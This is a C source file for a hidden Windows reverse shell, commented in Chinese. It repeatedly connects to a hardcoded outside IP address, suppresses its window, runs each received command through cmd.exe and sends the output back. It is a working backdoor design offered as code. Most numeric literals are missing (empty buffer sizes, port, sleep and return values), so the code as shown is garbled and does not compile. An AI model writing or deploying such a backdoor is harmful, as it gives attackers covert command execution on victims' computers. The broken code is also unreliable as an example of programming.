#pragma comment(lib,"ws2_32.lib")

#ifdef _MSC_VER

#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )

#endif

#include <winsock2.h>

#include <windows.h>

int main(int argc,char **argv)

{

char *messages = "======================== Connect successful !========================\n";

WSADATA WSAData;

SOCKET sock; //创建套接字

SOCKADDR_IN addr_in;

char buf[]; //buf作为socket接收数据的缓冲区

memset(buf,,); //清空缓冲区

WSAStartup(MAKEWORD(,),&WSAData); //初始化ws2

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(); //反向连接的远端主机端口

addr_in.sin_addr.S_un.S_addr=inet_addr("59.110.167.239"); //远端IP

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

while (WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) //连接客户主机

{

Sleep(); //连接失败，停顿5s，再试

continue;

}

send(sock,messages,strlen(messages),); //发送success信息

char buffer[] = {};//管道输出的数据

for(char cmdline[];;memset(cmdline,,sizeof(cmdline))){

SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出

HANDLE hRead,hWrite;

sa.nLength = sizeof(SECURITY_ATTRIBUTES);

sa.lpSecurityDescriptor = NULL;

sa.bInheritHandle = TRUE;

CreatePipe(&hRead,&hWrite,&sa,); //创建管道

STARTUPINFO si;

PROCESS_INFORMATION pi;

si.cb = sizeof(STARTUPINFO);

GetStartupInfo(&si); //STARTUPINFO 结构

si.hStdError = hWrite;

si.hStdOutput = hWrite;

si.wShowWindow = SW_HIDE; //隐藏窗口

si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

GetSystemDirectory(cmdline,MAX_PATH+); //获得系统路径

strcat(cmdline,"//cmd.exe /c"); //路径+/cmd.exe

int len=recv(sock,buf,,NULL);

if(len==SOCKET_ERROR) exit(); //如果客户端断开连接，则自动退出程序

strncat(cmdline,buf,strlen(buf)); //把命令参数复制到cmdline

CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi); //创建进程

CloseHandle(hWrite);

for(DWORD bytesRead;ReadFile(hRead,buffer,,&bytesRead,NULL); //循环读取管道中数据并发送，直到管道中没有数据为止

memset(buffer,,)){

send(sock,buffer,strlen(buffer),);

}

}

return ;

}